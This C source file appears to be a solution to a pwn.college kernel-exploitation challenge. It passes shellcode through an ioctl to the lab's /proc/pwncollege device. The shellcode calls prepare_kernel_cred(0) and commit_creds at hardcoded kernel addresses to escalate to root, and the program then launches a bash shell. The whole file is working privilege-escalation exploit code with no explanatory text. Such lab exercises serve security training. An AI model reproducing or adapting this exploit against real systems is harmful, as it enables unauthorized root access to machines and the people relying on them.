#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>

struct ioctl_args {
    uint64_t length;
    uint8_t shellcode[0x1000];
    uint64_t codeptr;
}args;

__attribute__((naked))
void shellcode() {
    asm volatile(
        "xor %rdi, %rdi\n"
        "movabs $0xffffffff81089660, %rsi\n"
        "callq *%rsi\n" // prepare_kernel_cred
        "movq %rax, %rdi\n"
        "movabs $0xffffffff81089310, %rsi\n"
        "callq *%rsi\n" // commit_creds
        "retq\n"
    );
}

int main() {
    args.length = 0x1f;
    memcpy(args.shellcode, shellcode, args.length);
    args.codeptr = 0xffffc90000085000ull;
    int fd = open("/proc/pwncollege", O_WRONLY);
    ioctl(fd, 1337, &args);
    execve("/bin/bash", NULL, NULL);
}